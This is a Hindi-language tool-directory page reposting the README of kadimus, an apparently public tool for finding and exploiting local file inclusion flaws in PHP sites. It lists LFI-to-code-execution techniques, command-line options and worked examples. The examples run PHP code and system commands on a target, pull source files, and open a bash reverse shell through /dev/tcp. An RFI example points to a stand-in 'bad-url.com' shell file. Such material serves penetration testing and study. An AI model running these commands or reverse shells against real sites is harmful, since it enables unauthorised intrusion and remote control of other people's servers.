Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/p0cl4bs/kadimus
भेद्यता स्कैनरकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलArchived
GitHubp0cl4bs/kadimus

kadimus

kadimus एक उपकरण है जो lfi भेद्यता की जाँच और शोषण करने के लिए है।

रिपॉजिटरी देखें
57512736 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

LFI स्कैन और शोषण उपकरण

kadimus एक उपकरण है जो LFI कमजोरियों की जाँच और शोषण के लिए है, जिसमें PHP सिस्टम पर ध्यान केंद्रित किया गया है।

विशेषताएँ:

  • सभी URL पैरामीटर की जाँच करें
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • स्रोत कोड प्रकटीकरण
  • HTTP अनुरोध के माध्यम से कमांड शेल इंटरफ़ेस
  • प्रॉक्सी समर्थन (socks4://, socks4a://, socks5:// ,socks5h:// और http://)
  • रिमोट कनेक्शन के लिए प्रॉक्सी socks5 समर्थन
  • संकलन करें:

    पहले सुनिश्चित करें कि आपके सिस्टम पर सभी निर्भरताएँ स्थापित हैं: libcurl, libopenssl, libpcre और libssh.

    फिर आप रिपॉजिटरी को क्लोन कर सकते हैं, स्रोत कोड प्राप्त करने के लिए:

    root@kitploit:~
    $ git clone https://github.com/P0cL4bs/kadimus.git
    $ cd kadimus
    

    और अंत में:

    root@kitploit:~
    $ make
    

    विकल्प:

    root@kitploit:~
    Options:
      -h, --help                    यह सहायता मेनू प्रदर्शित करें
    
      Request:
        -B, --cookie STRING         कस्टम HTTP कुकी हेडर सेट करें
        -A, --user-agent STRING     सर्वर को भेजने के लिए User-Agent
        --connect-timeout SECONDS   कनेक्शन के लिए अधिकतम अनुमत समय
        --retry NUMBER              यदि कनेक्शन विफल हो तो पुनः प्रयासों की संख्या
        --proxy STRING              कनेक्ट करने के लिए प्रॉक्सी (सिंटैक्स: protocol://hostname:port)
    
      Scanner:
        -u, --url STRING            स्कैन/शोषण करने के लिए URL
        -o, --output FILE           आउटपुट परिणाम सहेजने के लिए फ़ाइल
    
      Explotation:
        --parameter STRING          इंजेक्ट शोषण के लिए पैरामीटर नाम
                                    (केवल RCE डेटा और स्रोत प्रकटीकरण के लिए आवश्यक)
    
      RCE:
        -T, --technique=TECH        उपयोग करने के लिए LFI से RCE तकनीक
        -C, --code STRING           निष्पादित करने के लिए कस्टम PHP कोड, php ब्रैकेट के साथ
        -c, --cmd STRING            कमजोर लक्ष्य सिस्टम पर सिस्टम कमांड निष्पादित करें
        -s, --shell                 HTTP अनुरोध के माध्यम से सरल कमांड शेल इंटरफ़ेस
    
        --connect STRING            कनेक्ट करने के लिए IP/होस्टनाम
        -p, --port NUMBER           कनेक्ट या सुनने के लिए पोर्ट नंबर
        -l, --listen                इनकमिंग कनेक्शन के लिए बाइंड और सुनें
    
        --ssh-port NUMBER           कमांड इंजेक्शन का प्रयास करने के लिए SSH पोर्ट सेट करें (डिफ़ॉल्ट: 22)
        --ssh-target STRING         SSH होस्ट सेट करें
    
        RCE उपलब्ध तकनीकें
    
          environ                   /proc/self/environ का उपयोग करके PHP कोड चलाने का प्रयास
          input                     php://input का उपयोग करके PHP कोड चलाने का प्रयास
          auth                      /var/log/auth.log का उपयोग करके PHP कोड चलाने का प्रयास
          data                      data://text का उपयोग करके PHP कोड चलाने का प्रयास
          expect                    expect://cmd का उपयोग करके कमांड चलाने का प्रयास
    
        Source Disclosure:
          -S, --source              filter:// का उपयोग करके स्रोत फ़ाइल प्राप्त करने का प्रयास
          -f, --filename STRING     स्रोत प्राप्त करने के लिए फ़ाइल नाम सेट करें [आवश्यक]
          -O FILE                   आउटपुट फ़ाइल सेट करें (डिफ़ॉल्ट: stdout)
    
    

    उदाहरण:

    स्कैनिंग:

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact -A my_user_agent
    

    फ़ाइल का स्रोत कोड प्राप्त करें:

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
    

    PHP कोड निष्पादित करें:

    root@kitploit:~
    ./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input
    

    कमांड निष्पादित करें:

    root@kitploit:~
    ./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
    

    RFI की जाँच करना:

    आप RFI त्रुटियों की भी जाँच कर सकते हैं — बस रिमोट URL को resource/common_files.txt में डालें और उनकी पहचान करने के लिए रीजेक्स, उदाहरण:

    root@kitploit:~
    /* http://bad-url.com/shell.txt */
    <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
    

    फ़ाइल में:

    root@kitploit:~
    http://bad-url.com/shell.txt?:scorpion say get over here
    

    रिवर्स शेल:

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
    

    योगदान

    आप कोड के माध्यम से, या दान करके मदद कर सकते हैं। यदि आप कोड के साथ मदद करना चाहते हैं, तो कर्नेल कोड शैली को संदर्भ के रूप में उपयोग करें।

    Paypal:

    BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

    टूल डाउनलोड करें